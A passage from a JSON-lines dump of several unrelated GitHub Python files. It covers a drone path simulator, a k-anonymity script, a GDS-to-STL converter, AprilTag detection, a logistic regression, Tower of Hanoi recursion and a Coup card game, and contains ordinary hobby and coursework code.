math.sqrt(speed**2 - vx**2)\r\n #print(vx,vy)\r\n if (dst[0] < self.drone_position[id][0]):\r\n direction_x = -1\r\n if (dst[1] < self.drone_position[id][1]):\r\n direction_y = -1\r\n self.drone_label[id].place(x = self.drone_position[id][0]+vx*delta*direction_x, y = self.drone_position[id][1]+vy*delta*direction_y)\r\n temp =(self.drone_position[id][0] + vx*delta*direction_x, self.drone_position[id][1] + vy*delta*direction_y)\r\n self.drone_position[id] = temp\r\n self.after(delta, self.fly,self.src[id],dst,id)\r\n\r\n def callback(self,event):\r\n if self.last_clicked != 0 :\r\n self.cur_pos = 0\r\n self.last_clicked.destroy()\r\n print(\"clicked at\", event.x, event.y)\r\n self.src_entry.delete(0,tk.END)\r\n self.src_entry.insert(0,str(event.x))\r\n self.cur_pos = (event.x,event.y)\r\n image2 = Image.open(\"./circle.png\")\r\n image2 = image2.resize((10, 10), Image.ANTIALIAS)\r\n test = ImageTk.PhotoImage(image2)\r\n label1 = tk.Label(image=test)\r\n label1.image = test\r\n # Position image\r\n label1.place(x=event.x, y=event.y)\r\n self.last_clicked = label1\r\n\r\n def calculate_path (self,points) -> float:\r\n # if abs(dst-src) > RANGE_LIMIT:\r\n # pass\r\n\r\n #get linear equation\r\n x_coords, y_coords = zip(*points)\r\n A = vstack([x_coords,ones(len(x_coords))]).T\r\n m, c = lstsq(A, y_coords)[0]\r\n print(\"Line Solution is y = {m}x + {c}\".format(m=m,c=c))\r\n\r\n #iterate through the list of active drones\r\n for id in range(self.id):\r\n for i in range(len(self.registered[id])):\r\n #src,dst\r\n line = LineString([points[0],points[1]])\r\n other = LineString([self.drone_position[id],self.registered[id][i]])\r\n\r\n #check if the line section intersect\r\n if(line.intersects(other)) :\r\n #if intersect, find the collision point\r\n M = ((self.registered[id][i][1] - self.src[id][0])/abs(self.registered[id][i][1]-self.src[id][0]))\r\n C = self.src[id][1]-self.src[id][0]*M\r\n a = np.asarray([(M,1), (m,1)])\r\n b = np.asarray((C,c))\r\n ans = np.linalg.solve(a,b)\r\n time_left_old = math.hypot(ans[0]-self.drone_position[id][0],ans[1]-self.drone_position[id][1])/0.01\r\n time_left_new = math.hypot(ans[0]-points[0][0],ans[1]-points[0][1])/0.01\r\n if(abs(time_left_new-time_left_old) < 100000):\r\n return float(math.hypot(ans[0]-points[0][0],ans[1]-points[0][1])/100000.0)\r\n \r\n else :\r\n break\r\n return 0.01\r\n\r\ndef test():\r\n #src,dst\r\n now = datetime.now()\r\n current_time = now \r\n print(\"Current Time =\", current_time)\r\n\r\ntest()\r\nroot = tk.Tk()\r\nroot.geometry(\"1000x600\")\r\n\r\nExample(root).pack(fill=\"both\", expand=True)\r\nroot.mainloop()\r\n\r\n","repo_name":"jirawitkoko11/UTM","sub_path":"drone.py","file_name":"drone.py","file_ext":"py","file_size_in_byte":7405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13031300397","text":"import csv\nimport pandas as pd\nimport numpy as np\nimport copy\n\n# QI Values are [Block Range, StreetName, ZIP Code]\n# Block Range Anonymization: Full - Remove first digit - Remove second digit - removed all digits\n# StreetName anonymization: Full - remove half of name - remove full name\n# ZIPCODE Anonymization: FULL - remove 1 digit at a time.\nQI_ARRAY = [4, 2, 5]\nCURRENT_ARRAY = [0, 0, 0]\n\nclass QI_Count:\n def __init__(self, value, num):\n self.value = value\n self.num = num\n\n#QI_ARRAY will be used as a global variable for this specific dataset\ndef k_anonymize(df, k_value):\n qi_list = []\n print(\"1\")\n freq_list = make_freq_list(df)\n\n print(\"2\")\n print(freq_list)\n count = 1\n #Not sure what the second part of the while loop is about or how to incorporate it.\n # Every third time around, will remove one digit from ZIP Code\n # TODO - consider how empty zip codes mess up this algorithm\n while(freq_list['count'] < k_value).any():\n #Third time, just doing ZIP code anon, skipping rest of loop\n if count % 3 == 0 and count != 0:\n df = anonymize_attribute(df, \"ZIP Code\")\n freq_list = make_freq_list(df)\n # freq_check_duplicates is O(n^2), so we limit it to smaller freq_lists\n #if count > 3:\n # freq_check_duplicates(freq_list, k_value)\n \n count = count + 1\n continue\n most_uniq = find_uniq_values(df)\n df = anonymize_attribute(df, most_uniq)\n print(df.head())\n if isinstance(df, bool):\n print(\"uh oh\")\n exit(1)\n freq_list = make_freq_list(df)\n print(freq_list)\n count = count + 1\n print(df.head())\n \n# Requires dataframe\n# Makes a list of the frequency of a specific set of tuples. \ndef make_freq_list(df):\n freq_list = df.groupby(['ZIP Code', 'StreetName', 'Block Range']).size().reset_index().rename(columns={0:'count'}).sort_values(['count']).reset_index(drop=True)\n #Dropping any value where item is already anonymized from frequency list, as it shouldn't be counted.\n for index, row in freq_list.iterrows():\n if(row['ZIP Code'] == \"*****\" and row['StreetName'] == \"*\" and row['Block Range'] == \"*\"):\n freq_list.drop([index])\n\n return freq_list\n\n#This method looks to see if the ZIP code = \"*****\" and NIBRS, Block Range, and StreetName = another value. If so, it will delete the \n#row and add one to the count of the other value.\ndef freq_check_duplicates(freq_list, k_value):\n for index, row in freq_list.iterrows():\n print(\"index\" + str(index))\n if row['ZIP Code'] == \"*****\" and row['count'] < k_value:\n print('True')\n temp_s = row['StreetName']\n temp_b = row['Block Range']\n temp_count = row['count']\n for index_2, row_2 in freq_list.iterrows():\n if row['ZIP Code'] != \"*****\" and temp_s == row_2['StreetName'] and temp_b == row_2['Block Range']:\n freq_list.at[index_2, 'count'] = freq_list.at[index_2, 'count'] + temp_count\n freq_list.drop([index])\n break\n return freq_list\n\n#Finds the column with the most unique values\ndef find_uniq_values(df):\n zipc = len(pd.unique(df['ZIP Code']))\n street = len(pd.unique(df['StreetName']))\n block = len(pd.unique(df['Block Range']))\n vmax = max(zipc, street, block)\n if vmax == zipc:\n return \"ZIP Code\"\n if vmax == street:\n return \"StreetName\"\n if vmax == block:\n return \"Block Range\" \n\ndef anonymize_attribute(df, attribute_string):\n if attribute_string == \"ZIP Code\":\n if CURRENT_ARRAY[2] == 0:\n for index, row in df.iterrows():\n if pd.isnull(row['ZIP Code']):\n continue\n temp = row['ZIP Code']\n temp = list(temp)\n temp[4] = \"*\"\n temp = ''.join(map(str, temp))\n df.at[index, 'ZIP Code'] = temp\n CURRENT_ARRAY[2] = 1\n return df\n elif CURRENT_ARRAY[2] == 1:\n for index, row in df.iterrows():\n if pd.isnull(row['ZIP Code']):\n continue\n temp = row['ZIP Code']\n temp = list(temp)\n temp[3] = \"*\"\n temp = ''.join(map(str, temp))\n df.at[index, 'ZIP Code'] = temp\n CURRENT_ARRAY[2] = 2\n return df\n elif CURRENT_ARRAY[2] == 2:\n for index, row in df.iterrows():\n if pd.isnull(row['ZIP Code']):\n continue\n temp = row['ZIP Code']\n temp = list(temp)\n temp[2] = \"*\"\n temp = ''.join(map(str, temp))\n df.at[index, 'ZIP Code'] = temp\n CURRENT_ARRAY[2] = 3\n return df\n elif CURRENT_ARRAY[2] == 3:\n for index, row in df.iterrows():\n if pd.isnull(row['ZIP Code']):\n continue\n temp = row['ZIP Code']\n temp = list(temp)\n temp[1] = \"*\"\n temp = ''.join(map(str, temp))\n df.at[index, 'ZIP Code'] = temp\n CURRENT_ARRAY[2] = 4\n return df\n elif CURRENT_ARRAY[2] == 4:\n for index, row in df.iterrows():\n if pd.isnull(row['ZIP Code']):\n continue\n temp = row['ZIP Code']\n temp = list(temp)\n temp[0] = \"*\"\n temp = ''.join(map(str, temp))\n df.at[index, 'ZIP Code'] = temp\n CURRENT_ARRAY[2] = 5\n return df\n elif CURRENT_ARRAY[2] == 5:\n print(df.head())\n print(\"Shouldn't be here1\")\n return False\n #anything higher than this shouldn't be possible\n elif attribute_string == \"StreetName\":\n if CURRENT_ARRAY[1] == 0:\n for index, row in df.iterrows():\n if pd.isnull(row['StreetName']):\n continue\n temp = row['StreetName']\n length = len(row['StreetName'])\n temp = list(temp)\n #Cutting the string in half\n for i in range(int(length/2)):\n temp = temp[:-1]\n #Adding a * to the end of the half\n temp = ''.join(map(str, temp))\n temp = temp + \"*\"\n df.at[index, 'StreetName'] = temp\n CURRENT_ARRAY[1] = 1\n return df\n elif CURRENT_ARRAY[1] == 1:\n for index, row in df.iterrows():\n if pd.isnull(row['StreetName']):\n continue\n df.at[index, 'StreetName'] = \"*\"\n CURRENT_ARRAY[1] = 2\n return df\n elif CURRENT_ARRAY[1] == 2:\n print(df.head())\n print(\"Shouldn't be here.2\")\n return False\n elif attribute_string == \"Block Range\":\n if CURRENT_ARRAY[0] == 0:\n for index, row in df.iterrows():\n if pd.isnull(row['Block Range']):\n continue\n if row['Block Range'] == \"*\":\n continue\n temp = row['Block Range'] \n if int(temp) < 1000:\n df.at[index, 'Block Range'] = \"< 1000\"\n elif int(temp) >= 1000 and int(temp) < 2000:\n df.at[index, 'Block Range'] = \">= 1000 < 2000\"\n elif int(temp) >= 2000 and int(temp) < 3000:\n df.at[index, 'Block Range'] = \">= 2000 < 3000\"\n elif int(temp) >= 3000 and int(temp) < 4000:\n df.at[index, 'Block Range'] = \">= 3000 < 4000\"\n elif int(temp) >= 4000 and int(temp) < 5000:\n df.at[index, 'Block Range'] = \">= 4000 < 5000\"\n elif int(temp) >= 5000 and int(temp) < 6000:\n df.at[index, 'Block Range'] = \">= 500 < 600\"\n elif int(temp) >= 6000 and int(temp) < 7000:\n df.at[index, 'Block Range'] = \">= 6000 < 7000\"\n elif int(temp) >= 7000 and int(temp) < 8000:\n df.at[index, 'Block Range'] = \">= 7000 < 8000\"\n elif int(temp) >= 8000 and int(temp) < 9000:\n df.at[index, 'Block Range'] = \">= 8000 < 9000\"\n elif int(temp) >= 9000 and int(temp) < 10000:\n df.at[index, 'Block Range'] = \">= 9000 < 10000\"\n elif int(temp) >= 10000:\n df.at[index, 'Block Range'] = \">= 10000\"\n CURRENT_ARRAY[0] = 1\n return df\n elif CURRENT_ARRAY[0] == 1:\n for index, row in df.iterrows():\n if pd.isnull(row['Block Range']):\n continue\n temp = row['Block Range']\n if temp == \"< 1000\":\n df.at[index, 'Block Range'] = \"< 2000\"\n elif temp == \">= 1000 < 2000\":\n df.at[index, 'Block Range'] = \"< 2000\"\n elif temp == \">= 2000 < 3000\":\n df.at[index, 'Block Range'] = \">= 2000 < 4000\"\n elif temp == \">= 3000 < 4000\":\n df.at[index, 'Block Range'] = \">= 2000 < 4000\"\n elif temp == \">= 4000 < 5000\":\n df.at[index, 'Block Range'] = \">= 4000 < 6000\"\n elif temp == \">= 5000 < 6000\":\n df.at[index, 'Block Range'] = \">= 4000 < 6000\"\n elif temp == \">= 6000 < 7000\":\n df.at[index, 'Block Range'] = \">= 6000 < 8000\"\n elif temp == \">= 7000 < 8000\":\n df.at[index, 'Block Range'] = \">= 6000 < 8000\"\n elif temp == \">= 8000 < 9000\":\n df.at[index, 'Block Range'] = \">= 8000 < 10000\"\n elif temp == \">= 9000 < 10000\":\n df.at[index, 'Block Range'] = \">= 8000 < 10000\"\n else:\n df.at[index, 'Block Range'] = \">= 10000\"\n CURRENT_ARRAY[0] = 2\n return df\n elif CURRENT_ARRAY[0] == 2:\n for index, row in df.iterrows():\n if pd.isnull(row['Block Range']):\n continue\n temp = row['Block Range']\n if temp == \"< 2000\" or temp == \">= 2000 < 4000\":\n df.at[index, 'Block Range'] = \"< 4000\"\n elif temp == \">= 4000 < 6000\" or temp == \">= 6000 < 8000\":\n df.at[index, 'Block Range'] = \">= 4000 < 8000 \"\n elif temp == \">= 8000 < 10000\" or temp == \">= 10000\":\n df.at[index, 'Block Range'] = \">= 8000\"\n CURRENT_ARRAY[0] = 3\n return df\n\n","repo_name":"cwszolek2/Data-Security-Project-Kanonymity","sub_path":"kanonymize.py","file_name":"kanonymize.py","file_ext":"py","file_size_in_byte":10836,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"70836063555","text":"import sys # read command-line arguments\nimport os\nimport json\nimport gdspy # open gds file\nimport argparse\nimport logging\nimport uuid\nimport copy\nimport svgwrite\nimport subprocess\n\nlog_format = logging.Formatter('%(asctime)s - %(module)-10s - %(levelname)-8s - %(message)s')\nlogger = logging.getLogger('')\nlogger.setLevel(logging.NOTSET)\nch = logging.StreamHandler(sys.stdout)\nch.setFormatter(log_format)\nlogger.addHandler(ch)\n\ndef generate_layermask(layer_name: str, polys):\n logging.info(f\"generating {layer_name} with {len(polys)} polygons\")\n dwg = svgwrite.Drawing(f'masks/{layer_name}.svg', profile='tiny')\n for p in polys:\n dwg.add(svgwrite.shapes.Polygon(p.tolist(), fill='red'))\n dwg.save()\n\ndef read_gds(filepath: str):\n logger.info(f\"trying to read {filepath} as .gds file...\")\n gdsii = gdspy.GdsLibrary()\n gdsii.read_gds(filepath, units='import')\n cells = [c for c in gdsii]\n logger.info(f\"found {len(cells)} cells\")\n\n logger.info(f\"I will now attempt to flatten and find the biggest cell...\")\n cells_by_polys = []\n for cit, cell in enumerate(cells):\n cell_flat = copy.deepcopy(cell).flatten()\n cells_by_polys.append((len(cell_flat.polygons), uuid.uuid4(), cell_flat))\n logger.debug(f\"{cell.name}: {cit} of {len(cells)} done...\")\n if cit > 50:\n break\n\n cc, _, cell = sorted(cells_by_polys)[-1]\n logger.info(f\"it looks like {cell.name} is the major with {cc} polys.\")\n layers = cell.get_polygons(True)\n logger.info(f\"{cell.name} has {len(layers)} layers. Iterating and creating polygons...\")\n for lname, polys in layers.items():\n generate_layermask(lname, polys)\n\n#read_gds(\"../caravel_user_project/openlane/user_project_wrapper/runs/user_project_wrapper/results/magic/user_project_wrapper.gds\")\n\ndef emit_stl(filename):\n logger.info(f\"working on {filename}\")\n\n try:\n os.rm(\"stls/generate_stl.scad\")\n except:\n pass\n \n with open(\"stls/generate_stl.scad\", \"w+\") as f:\n f.write(\"linear_extrude(height = 0.1, center = true, scale = 1.0)\")\n f.write(f\"import(file = \\\"{os.getcwd()}/masks/{filename}\\\", center = false, dpi = 96);\")\n\n subprocess.call([\"openscad\", \"stls/generate_stl.scad\", \"-o\", f\"{os.getcwd()}/stls/{filename}.stl\"])\n\ndef convert_to_stls():\n logger.info(f\"since blender is stupid, I'll generate .stl from .svg using openscad\")\n files = os.listdir(\"masks/\")\n for mfile in files:\n emit_stl(mfile)\n \nread_gds(\"../caravel_user_project/openlane/user_project_wrapper/runs/user_project_wrapper/results/magic/user_project_wrapper.gds\")\nconvert_to_stls()\n#python3 gds_to_json.py -g ../../caravel_user_project/openlane/user_project_wrapper/runs/user_project_wrapper/results/magic/user_project_wrapper.gds \n# -l ../../caravel_user_project/openlane/user_project_wrapper/runs/user_project_wrapper/results/lvs/user_project_wrapper.lvs.lef.json -o out.json\n","repo_name":"zbigos/GDS-Renderator","sub_path":"src/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18312910959","text":"import datetime\nimport functools\nfrom typing import Callable, Any, List, Dict\nimport json\n\n\ndef build_converter(feature_type: str,\n configs: Dict[str, Any]\n ) -> Callable[[str], Any]:\n if feature_type == 'int':\n return int\n\n if feature_type == 'float':\n return float\n\n if feature_type == 'str':\n return _identity\n\n if feature_type == 'bool':\n return _parse_boolean\n\n if feature_type == 'timestamp':\n return functools.partial(_parse_timestamp, date_format=configs.get('format'))\n\n if feature_type == 'list':\n element_type = configs.get(\"element_type\")\n delimiter = configs.get('delimiter')\n converter = build_converter(element_type, configs)\n return functools.partial(_parse_list, delimiter=delimiter, converter=converter)\n\n if feature_type == 'pd.array':\n element_type = configs.get(\"element_type\")\n converter = build_converter(element_type, configs)\n return functools.partial(_parse_pd_array, converter=converter)\n\n raise KeyError(f'{feature_type} not supported. Currently bool, str, float, timestamp, int, pd.array and list are supported. '\n f'See documentation for more details')\n\n\ndef _parse_boolean(text: str\n ) -> bool:\n return text == 'True'\n\n\ndef _parse_timestamp(text: str,\n date_format: str\n ) -> datetime.datetime:\n return datetime.datetime.strptime(text, date_format)\n\n\ndef _parse_list(text: str,\n converter: Callable[[str],Any],\n delimiter: str) -> List[str]:\n return list(map(converter, text.split(sep=delimiter)))\n\n\ndef _parse_pd_array(text: str,\n converter: Callable[[str], Any]) -> List[str]:\n text = json.loads(text)\n #text = text.strip('][').replace('\"', '').split(',')\n # text = ast.literal_eval(text)\n return list(map(converter, text))\n\n\ndef _identity(text: str\n ) -> str:\n return text\n","repo_name":"elisabethfischer/non-item-transformers","sub_path":"src/asme/data/utils/converter_utils.py","file_name":"converter_utils.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3194944180","text":"class IntLiteral:\n def __init__(self,strval,intparser=None):\n self.strval=strval\n self.intparser=intparser or int\n \n def value(self):\n return self.intparser(self.strval)\n\n\n# arbitrary custom integer parser\ndef custint(x):\n if '.' in x:\n return int(x.split('.')[0])\n return int(x)\n\nsn1=IntLiteral('3')\npn1=sn1.value()\nprint(pn1,type(pn1)) # 3 \n\nsn2=IntLiteral('42.5',custint)\npn2=sn2.value()\nprint(pn2,type(pn2)) # 42 \n\n","repo_name":"heerdyes/gof-design-patterns","sub_path":"factorymethod/factorymethoddemo.py","file_name":"factorymethoddemo.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33316964307","text":"import numpy as np\nimport apriltag\nimport depthai as dai\nimport cv2\nfrom scipy.spatial.transform import Rotation as R\n\ncamera_parameters = {}\ncamera_parameters['IntrinsicMatrix'] = np.array([\n [788.5933, 0, 0],\n [-1.5284, 790.1151, 0],\n [267.2851, 257.6332, 1]])\ncamera_parameters['RadialDistortion'] = np.array([0.2647, -1.0395, 2.6651])\ncamera_parameters['TangentialDistortion'] = np.array([0.0031, 0.0104])\nnp.save('img/calibrate/parameters.npy', camera_parameters)\nK = camera_parameters['IntrinsicMatrix']\n\n\ndef create_pipeline():\n pipeline = dai.Pipeline()\n camRgb = pipeline.create(dai.node.ColorCamera)\n xoutRgb = pipeline.create(dai.node.XLinkOut)\n xoutRgb.setStreamName(\"rgb\")\n camRgb.setPreviewSize(400, 400)\n camRgb.setInterleaved(False)\n camRgb.setColorOrder(dai.ColorCameraProperties.ColorOrder.RGB)\n camRgb.preview.link(xoutRgb.input)\n return pipeline\n\n\ndef create_detector():\n options = apriltag.DetectorOptions(families=\"tag36h11\")\n detector = apriltag.Detector(options)\n return detector\n\n\ndef draw_tag(r, image, eularangle):\n (ptA, ptB, ptC, ptD) = r.corners\n ptB = (int(ptB[0]), int(ptB[1]))\n ptC = (int(ptC[0]), int(ptC[1]))\n ptD = (int(ptD[0]), int(ptD[1]))\n ptA = (int(ptA[0]), int(ptA[1]))\n # draw the bounding box of the AprilTag detection\n cv2.line(image, ptA, ptB, (0, 255, 0), 2)\n cv2.line(image, ptB, ptC, (0, 255, 0), 2)\n cv2.line(image, ptC, ptD, (0, 255, 0), 2)\n cv2.line(image, ptD, ptA, (0, 255, 0), 2)\n # draw the center (x, y)-coordinates of the AprilTag\n (cX, cY) = (int(r.center[0]), int(r.center[1]))\n cv2.circle(image, (cX, cY), 5, (0, 0, 255), -1)\n # draw the tag family on the image\n tagFamily = r.tag_family.decode(\"utf-8\")\n cv2.putText(image, tagFamily, (ptA[0], ptA[1] - 15),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n ARROW_LENGTH = 120\n dirangle = (eularangle[2] - 5) * np.pi / 180 * 1.8\n deltax = np.sin(dirangle) * ARROW_LENGTH\n deltay = ARROW_LENGTH / 2 * np.cos(dirangle)\n newcneter = r.center + np.array([deltax, deltay])\n cv2.circle(image, tuple(newcneter.astype(int)), 8, (255, 0, 0), 5)\n cv2.line(image, tuple(newcneter.astype(int)),\n tuple(r.center.astype(int)),\n (255, 0, 0), 2)\n\n\npipeline = create_pipeline()\ndetector = create_detector()\nqRgb: dai.DataOutputQueue\ninRgb: dai.ImgFrame\ntag: apriltag.Detection\nwith dai.Device(pipeline) as device:\n print('Connected cameras:', device.getConnectedCameraFeatures())\n qRgb = device.getOutputQueue(name=\"rgb\", maxSize=4, blocking=False)\n\n while True:\n inRgb = qRgb.get()\n image = inRgb.getCvFrame()\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n results = detector.detect(gray)\n for tag in results:\n homo = tag.homography\n num, Rs, Ts, Ns = cv2.decomposeHomographyMat(homo, K)\n r = R.from_matrix(Rs.T)\n eularangle = r.as_euler('xyz').T * 180 / np.pi\n","repo_name":"Seas00n/Big_Rover","sub_path":"AprilTag/apriltag_distance.py","file_name":"apriltag_distance.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41382671068","text":"# -*- coding:utf-8 -*- \n_author_ = 'jackie.ma'\n\ndef han_list(n,frm,to,temp):\n if n<2:\n to.append(frm.pop())\n else:\n fabi(n-1,frm,temp,to)\n fabi(1,frm,to,temp)\n fabi(n-1,temp,to,frm)\n\n\ndef fabi(n,frm,to,temp):\n\n if n<2:\n print(frm,'-->',to)\n s1.append([frm,'-->',to])\n\n else:\n fabi(n-1,frm,temp,to)\n #print('a----', n, '--from', frm, 'to', to, 'temp', temp)\n fabi(1,frm,to,temp)\n #to.append(frm.pop())\n #print('a----', n, '--from', frm, 'to', to, 'temp', temp)\n fabi(n-1,temp,to,frm)\n #print('a----', n, '--from', frm, 'to', to, 'temp', temp)\ndef hanoi(n, a, b, c):\n if n == 1:\n s2.append([a, '-->', c])\n print(a, '-->', c)\n else:\n hanoi(n - 1, a, c, b)\n s2.append([a, '-->', c])\n print(a, '-->', c)\n hanoi(n - 1, b, a, c)\n# 调用\n\n\ndef fact(n):\n if n<2:\n return 1\n else:\n y=n*fact(n-1)\n print('n=',n,'---',y)\n return y\nif __name__ == \"__main__\":\n nx=3\n a=[x for x in range(nx)]\n b,c=[],[]\n s1,s2=[],[]\n fabi(nx,'A','C','B')\n print('daan')\n hanoi(nx, 'A', 'B', 'C')\n if s1==s2:\n print(True)\n else:\n print('YIMA')\n print(s1)\n print(s2)\n","repo_name":"fajunma/Python","sub_path":"DLL/fabi.py","file_name":"fabi.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9752499688","text":"import torch\nimport numpy as np\nimport pandas as pd\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.functional as F\ndef CrossEntropyLoss(y_predict, y_target):\n return torch.sum(-y_target * torch.log(y_predict) - (1 - y_target) * torch.log(1 - y_predict))\n\nclass logisticmodel(nn.Module):\n def __init__(self):\n super().__init__()\n self.linear = nn.Linear(4, 1)\n \n def forward(self, x):\n x = self.linear(x)\n x = torch.sigmoid(x)\n return x\n\nmodel = logisticmodel()\noptimizer = torch.optim.SGD(model.parameters(), lr = 0.00001)\n\nD = torch.tensor(pd.read_csv('label.csv', header = None).values, dtype = torch.float)\nx_dataset = D[:, 0:4].view(-1,4)\n#x_dataset[:, 0], x_dataset[:, 1] = x_dataset[:,0]+x_dataset[:,1], x_dataset[:,2]+x_dataset[:,3]\n#x_dataset = x_dataset[:,0:2]\ny_dataset = D[:, 4].view(-1,1)\nduichen = True\nif duichen:\n for i in range(len(x_dataset)):\n if x_dataset[i, 0] < 0:\n x_dataset[i] = -x_dataset[i]\nlast_loss = 0\nfor i in range(200000):\n optimizer.zero_grad()\n y_predict = model(x_dataset)\n loss = CrossEntropyLoss(y_predict, y_dataset)\n loss.backward()\n optimizer.step()\n if i % 10 == 0:\n print('------\\n',loss, y_predict[y_dataset == 1], y_predict[y_dataset == 0])\n\n if abs(last_loss - loss) < 0.0001:\n print(last_loss, loss)\n oz = [item > 0.5 for item in y_predict]\n print(np.sum([oz[i] == y_dataset[i] for i in range(len(y_dataset))]), '/', len(y_dataset))\n break\n last_loss = loss\n\n","repo_name":"info-ruc/2317","sub_path":"2016202106/src/logistic.py","file_name":"logistic.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13873501739","text":"import sys\r\n\r\nINF = sys.maxsize\r\nN,M = map(int, sys.stdin.readline().split())\r\narr = [list(map(int, input().split())) for _ in range(N)]\r\nprint(arr)\r\nminArr = list()\r\n\r\nfor i in range(N):\r\n minNum = INF\r\n for j in range(M):\r\n if minNum > arr[i][j]:\r\n minNum = arr[i][j]\r\n minArr.append(minNum)\r\n\r\nprint(minArr)\r\nprint(max(minArr))\r\n","repo_name":"whiskey21/my-algorithm-book","sub_path":"그리디/숫자카드게임.py","file_name":"숫자카드게임.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11139097906","text":"from turtle import *\n\n\ndef szyfr(alphabet, subject):\n TurtleScreen._RUNNING = True\n vowels = \"aeiouy\"\n class rect_struct:\n def __init__(self, width, height, side):\n self.width = width; self.height = height; self.side = side\n def __iter__(self):\n return iter([self.width, self.height, self.side])\n def width_func(idx): return (idx + 1) * 10 \n def height_func(letter): return (alphabet.find(letter) + 1) * 10\n def side_func(letter): return 1 if letter not in vowels else -1\n\n def draw_rect(width, height, side):\n for _ in range(2):\n for length in (width, height):\n forward(length)\n left(90 * side)\n \n rectangles = [rect_struct(width_func(i), height_func(letter), side_func(letter))\n for i, letter in enumerate(subject)]\n\n pu()\n max_height = max(rect.height * rect.side for rect in rectangles)\n min_height = min(rect.height * rect.side for rect in rectangles)\n left(90); back((max_height + min_height) / 2); right(90)\n back(sum(rect.width for rect in rectangles) / 2)\n pd()\n for width, height, side in rectangles:\n draw_rect(width, height, side)\n pu(); forward(width); pd()\n\ndef redukcja(number):\n number = list(str(number))[::-1]\n changing = True\n while changing:\n changing = False\n idx = 0\n while idx < len(number) - 1:\n if number[idx] == number[idx + 1]:\n changing = True\n number.pop(idx + 1)\n number[idx] = str(2 * int(number[idx]))[-1]\n idx += 1\n \n return int(\"\".join(number[::-1]))\n\n\ndef ile(digits_n, digit):\n c = 0\n lo = 10 ** (digits_n - 1)\n if digits_n == 1: lo -= 1\n up = 10 ** digits_n\n for n in range(lo, up):\n if str(digit) in str(n):\n c += 1\n return c\n \n\n","repo_name":"jbachurski/logia-tryhard-saga","sub_path":"Ye Olde/Etap 2/2015/2015.py","file_name":"2015.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29351175388","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 14 10:17:51 2021\n\n@author: nicol\n\"\"\"\nimport random\n\nclass Game:\n def __init__(self,coins, cards, maze):\n self.coins=coins\n self.cards=cards\n self.maze=maze\n \n def Starting_money(self):\n Bag_of_coins= self.coins\n return Bag_of_coins \n \n def Actions(self,action, array):\n validator=0\n while validator ==0:\n if action== \"income\":\n self.coins+=1\n return self.coins\n \n elif action == \"foreign aid\":\n self.coins+=2\n return self.coins\n \n elif action== \"coup\" :\n if self.coins>=7:\n self.coins-=7\n print(array)\n couped_player=input(\"Which player do you want to copue: \")\n while couped_player not in array:\n print(array)\n couped_player=input(\"You must give a valid player: \")\n return couped_player\n else:\n print(\"You don´t have enough coins to make that action\\n\")\n return \"not valid\"\n \n \n elif action== 'taxes':\n self.coins+=3\n return self.coins\n \n elif action== \"murder\":\n if self.coins >=3:\n self.coins-=3\n print(array)\n murdered_player=input(\"Which player do you want to kill: \")\n while murdered_player not in array:\n print(array)\n murdered_player=input(\"You must give a valid player: \")\n return murdered_player\n else:\n print(\"You don´t have enough coins to make that action\\n\")\n return \"not valid\"\n \n elif action == \"extorsion\":\n print(array)\n stealed_player=input(\"Which player do you want to steal from: \")\n while stealed_player not in array:\n print(array)\n stealed_player=input(\"You must give a valid player: \")\n return stealed_player\n \n elif action== \"change\":\n if len(array)>1:\n candidates=[]\n random.shuffle(self.maze)\n counter=0\n while counter \",str(counter))\n counter+=1\n \n answer=input(\"Please choose your combination: \")\n while answer!=\"1\" and answer!=\"2\" and answer!=\"3\" and answer!=\"4\" and answer!=\"5\" and answer!=\"6\":\n answer=input(\"You must give a valid answer: \") \n \n if int(answer)==1:\n return option1\n if int(answer)==2:\n return option2\n if int(answer)==3:\n return option3\n if int(answer)==4:\n return option4\n if int(answer)==5:\n return option5\n if int(answer)==6:\n return option6\n else:\n random.shuffle(self.maze)\n changer= self.maze.pop(0)\n option1=[changer]\n option2=[array]\n options=[option1,option2]\n print(\"\\nYour options are:\")\n number=1\n for value in options:\n print(str(value)+\" ---> \"+str(number))\n number+=1\n \n answer=input(\"Please choose your combination: \")\n while answer!=\"1\" and answer!=\"2\":\n answer=input(\"You must give a valid answer: \") \n if int(answer)==1:\n return option1\n if int(answer)==2:\n return option2\n \n \n \n \n else:\n return \"not valid\"\n \n def Steal_actions(self, bag_of_coins):#steals coins from other players\n if bag_of_coins>=2:\n \n return bag_of_coins-2\n else:\n if bag_of_coins==0:\n print(\"This player has no coins left\")\n return bag_of_coins\n else:\n return bag_of_coins-1\n \n def Influence(self, action):\n \n if action==\"tax\":\n return \"duke\"\n \n elif action==\"murder\":\n return \"assasin\"\n \n elif action==\"extorsion\":\n return \"captain\"\n \n elif action==\"change\":\n return \"ambassador\"\n else:\n pass\n \n def CounterInfluence(self,action):\n if action==\"foreign aid\":\n return \"duke\"\n \n if action==\"murder\":\n return \"countess\"\n \n if action==\"extorsion\":\n return \"captain\"\n \n def Solution(self, looser, array):\n print(array)\n 